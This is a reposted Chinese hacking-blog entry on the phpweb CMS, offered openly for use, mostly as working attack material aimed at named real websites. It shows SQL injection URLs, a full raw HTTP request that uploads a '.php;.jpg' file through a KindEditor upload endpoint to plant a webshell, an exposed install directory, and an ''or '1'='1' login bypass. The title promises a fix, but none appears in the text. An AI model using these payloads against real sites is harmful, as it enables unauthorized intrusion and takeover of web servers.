记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

phpweb注射+上传+安装文件漏洞+万能密码(含修复方案)

2013-03-29 04:40

# Author: lostowlf home: hi.baidu.com/nginxshell

测试:
******sqlinjection*******

http://www.phpweb.net/down/class/index.php?myord=1{sqlinjection}

http://www.phpweb.net/photo/clas … mp;key=&myord=1 {sqlinjection}

***********getshell********
POST /kedit/upload_cgi/upload.php HTTP/1.0″
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
Referer: http://phpweb.net/news/admin/new … p;pid=all&page=
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=—————————7db516c0118
UA-CPU: x86
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Host: lib.jlnu.edu.cn
Proxy-Connection: Keep-Alive
Cookie: CODEIMG=6878; SYSZC=c7646d833635a773e6a89e364d9f0eca; SYSUSER=wlf; SYSNAME=%E7%8E%8B%E7%AB%8B%E5%B3%B0; SYSUSERID=15; SYSTM=1318373657- D1 F$ M( R3 _8 {3 U. V
Content-Length: 6620

—————————–7db516c0118
Content-Disposition: form-data; name=”fileName”

201110121318373662005.php;.jpg
—————————–7db516c0118
Content-Disposition: form-data; name=”attachPath”

news/pics/
—————————–7db516c0118
Content-Disposition: form-data; name=”fileData”; filename=”C:\6.gif”
Content-Type: image/gif
gif89a
‘);?>

*********install file:**********
http://www.chndianai.com /base/install/

*********admin********
www.chndianai.com /admin.php
username: admin ‘or ’1′=’1
username: admin ‘or ’1′=’1

知识来源: www.chndianai.com/phpweb%e6%b3%a8%e5%b0%84%e4%b8%8a%e4%bc%a0%e5%ae%89%e8%a3%85%e6%96%87%e4%bb

阅读:226495 | 评论:0 | 标签:入侵检测 漏洞预警 菜鸟入门

想收藏或者和大家分享这篇好文章→复制链接地址

“phpweb注射+上传+安装文件漏洞+万能密码(含修复方案)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云